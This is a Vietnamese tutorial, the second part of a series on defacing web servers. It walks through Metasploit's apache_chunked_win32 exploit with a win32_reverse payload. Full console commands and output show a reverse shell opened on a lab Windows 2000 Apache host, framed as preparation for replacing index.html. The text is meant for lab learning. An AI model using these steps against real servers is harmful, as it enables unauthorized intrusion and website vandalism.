Xem mẫu

  1. Các hoạt động phá hoại Web Server (Phần 2)
  2. Trong phần hai của loạt bài này chúng ta sẽ xem xét kỹ hơn cách thức deface (tức phá hoại hay thay đổi lại giao diện) một trang Web hoàn chỉnh. Công cụ được sử dụng ở đây là chương trình bảo mật nguồn mở khá nổi tiếng Metasploit Framework. Phần hướng dẫn chi tiết giúp bạn hiểu và tạo lại chương trình dễ dàng. Tóm tắt phần một Chúng ta sẽ tóm lược vắn tắt nội dung đã nêu ở phần một. Ở bài trước chúng ta đã nói đến cách thức một Web server có thể bị deface như thế nào và giới thiệu công cụ sử dụng cho hoạt động thử nghiệm để tự deface là gì. Trước khi tiếp tục xin được nhắc lại là các lỗ hổng tái tạo, hay trường hợp này là hoạt động deface Web server hoàn toàn hợp pháp trong chương trình học tập về bảo mật máy tính. Tuy nhiên bạn phải làm thử nghiệm ở môi trường thí nghiệm như đã nêu trong phần một. Mặc dù biết có nhiều điểm hạn chế, nhưng ít nhất cũng thoả mãn được phần nào trí tò mò của bạn. Chúng ta cũng sẽ khai thác Metasploit để hiểu sâu hơn về các hoạt động deface Web server. Từ lý thuyết đến thực tế Chúng ta sẽ tiếp tục với công cụ Metasploit và cách sử dụng nó. Trước hết là tăng mức hệ thống truy cập vào Web server Apache. Khi bạn thấy lớp ngoài đảo ngược, bạn có thể upload file index.html đã được thay đổi. Nó sẽ trở thành trang mặc định được đưa lên server, chẳng hạn như bản dữ liệu log của công ty bạn.
  3. Phần bên dưới cho biết điều gì thu được sau câu lệnh "show exploits" (đưa ra các lỗ hổng) khi bạn nhập nó ở màn hình lệnh prompt msf trong Metasploit. Danh sách các lỗi hổng có thể khai thác được đưa ra: msf > show exploits Metasploit Framework Loaded Exploits ==================================== Credits Metasploit Framework Credits AppleFileServer LoginExt PathName afp_loginext Buffer Overflow apache_chunked_win32 Apache Win32 Chunked Encoding ISS PAM.dll ICQ Parser Buffer blackice_pam_icq Overflow distcc_exec DistCC Daemon Command Execution Exchange 2000 MS03-46 Heap exchange2000_xexch50 Overflow Frontpage fp30reg.dll Chunked frontpage_fp30reg_chunked Encoding ia_webmail IA WebMail 3.x Buffer Overflow iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
  4. iis50_printer_overflow IIS 5.0 Printer Buffer Overflow iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow Bạn có thể thấy một số lỗ hổng có thể khai thác bên trong framework đã đưa ra. Danh sách trên đã được cắt bớt. Nếu bạn nhập cùng một lệnh như vậy, bạn sẽ có được danh sách đầy đủ. Chúng ta sẽ thử nghiệm với lỗ hổng thứ hai từ trên xuống: apache_chunked_win32. Bây giờ nhập lệnh để chọn lỗ hổng chúng ta sẽ dùng như sau: msf > use apache_chunked_win32 msf apache_chunked_win32 > Như bạn thấy ở trên, màn hình lệnh prompt xuất hiện trở lại, báo lại cho bạn biết lỗ hổng đã được chọn để dùng: apache_chunked_win32. Tiếp theo là lệnh kiểm tra các tuỳ chọn khác nhau gắn kèm với lỗ hổng dưới framework này. msf apache_chunked_win32 > show options Exploit Options =============== Exploit Name Default Description -------- ------ ------- ------------------ optional SSL Sử dụng SSL required RHOST Địa chỉ đích
  5. required RPORT 80 Cổng đích Target: Windows NT/2K Brute Force msf apache_chunked_win32 > Màn hình lệnh xuất hiện trở lại với danh sách các tuỳ chọn chúng ta cần điền đầy đủ như địa chỉ IP host từ xa. Chú ý là bạn cũng cần phải nhập địa chỉ IP host cục bộ, ví dụ như địa chỉ các máy tấn công của bạn trong môi trường thử nghiệm. Bạn cần nhập lệnh thiết lập các tuỳ chọn đó như sau: msf apache_chunked_win32 > set RHOST 192.168.1.101 RHOST -> 192.168.1.101 msf apache_chunked_win32 > Chúng ta sẽ xem tuỳ chọn LHOST ở phần sau trong bài này. Bạn thấy gì từ các tuỳ chọn khai thác lỗ hổng? Bây giờ chúng ta sẽ thiết lập giá trị cho trường này. Sau đó tiếp tục thực hiện dần dần với các tuỳ chọn khác nhau khác trước khi sử dụng lỗ hổng để tăng mức truy cập hệ thống trên Web server. Ở đây bạn sẽ dùng lệnh sau để xem chúng ta có thể dùng được loại payload nào: msf apache_chunked_win32 > show payloads Metasploit Framework Usable Payloads ==================================== win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject
  6. win32_bind_stg Windows Staged Bind Shell Windows Staged Bind win32_bind_stg_upexec Upload/Execute Windows Bind VNC Server win32_bind_vncinject DLL Inject win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_stg Windows Staged Reverse Shell Windows Reverse InlineEgg win32_reverse_stg_ie Stager Windows Staged Reverse win32_reverse_stg_upexec Upload/Execute Windows Reverse VNC Server win32_reverse_vncinject DLL Inject msf apache_chunked_win32 > Lựa chọn trên cho phép sử dụng bất kỳ phần nào bạn chọn. Có nghĩa là bạn sẽ có thể thực thi bất kỳ playload nào đã chọn bằng CPU của máy nạn nhân khi khai thác lỗ hổng bạn đang nhắm đến. Có thêm lựa chọn mở rộng này là một trong nhiều cách dùng tuyệt vời của công cụ bảo mật. Có rất nhiều lựa chọn dành cho bạn. Ở trường hợp của chúng ta là win32_reverse payload vì nó giúp tạo ra được lớp vỏ bên ngoài, cho phép sử
  7. dụng được nhiều lần khai thác để tấn công. Để rõ hơn bạn có thể copy lại file index.html và điều chỉnh nó bằng cách thay đổi giao diện. Xây dựng được lớp bên ngoài cho phép chúng ta thực hiện điều đó. Còn Framework bạn có tuỳ chọn payload thì sao? Hãy xem cú pháp bên dưới: msf apache_chunked_win32 > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf apache_chunked_win32(win32_reverse) > Bây giờ chúng ta đã thiết lập thông số cho payload và quay trở lại màn hình lệnh. Tiếp theo là thiết lập địa chỉ IP để nhận lớp ngoài đảo ngược. Thiết lập cho host nhận cũng tương tự như một vài bước biết lập cho RHOST trước đây để đặc tả máy sẽ tấn công. Thực hiện như sau: msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102 LHOST -> 192.168.1.102 msf apache_chunked_win32(win32_reverse) > Bây giờ chúng ta đã thực sự sẵn sàng khởi động lỗ hổng. Cú pháp như sau: msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101 [*] Starting Reverse Handler. [*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348... [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348... [*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding
  8. of 352... [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352... [*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356... [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356... [*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360... [*] Got connection from 192.168.1.101:1031 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\Program Files\Apache Group\Apache> Từ trên bạn có thể thấy màn hình lệnh trong thư mục Apache. Có một tuỳ chọn khác chúng ta có thể sử dụng để đặc tả hệ điều hành đang dùng trong trường hợp này là "target". Ngay cả khi bạn không mô tả tường minh, nó cũng sẽ cố gắng "thu xếp" để thực hiện những việc nó có thể làm. Để dùng tuỳ chọn target (đích), thực hiện như sau: msf apache_chunked_win32(win32_reverse) > show targets Danh sách các đích (target) sẽ được đưa ra. Tất cả việc bạn cần làm là chọn thứ bạn muốn và thiết lập nó như đã làm ở trên: msf apache_chunked_win32(win32_reverse) > set TARGET 1
  9. Câu lệnh trên nhập đích thứ nhất nếu server bộ nhớ là W2K Pro, Công việc đến đây có thể nói là đã hoàn thành. Web server Apache bây giờ đã bị bạn xâm hại và có phần bên ngoài đảo ngược. Bạn hoàn toàn có quyền kiểm soát và thao tác trên nó. Chúng ta kết thúc phần hai ở đây và sẽ tiếp tục trở lại phần ba, phần cuối cùng để thực sự phá hoại một trang Web và suy ngẫm về hậu quả phía sau của các cuộc tấn công như thế nào.
nguon tai.lieu . vn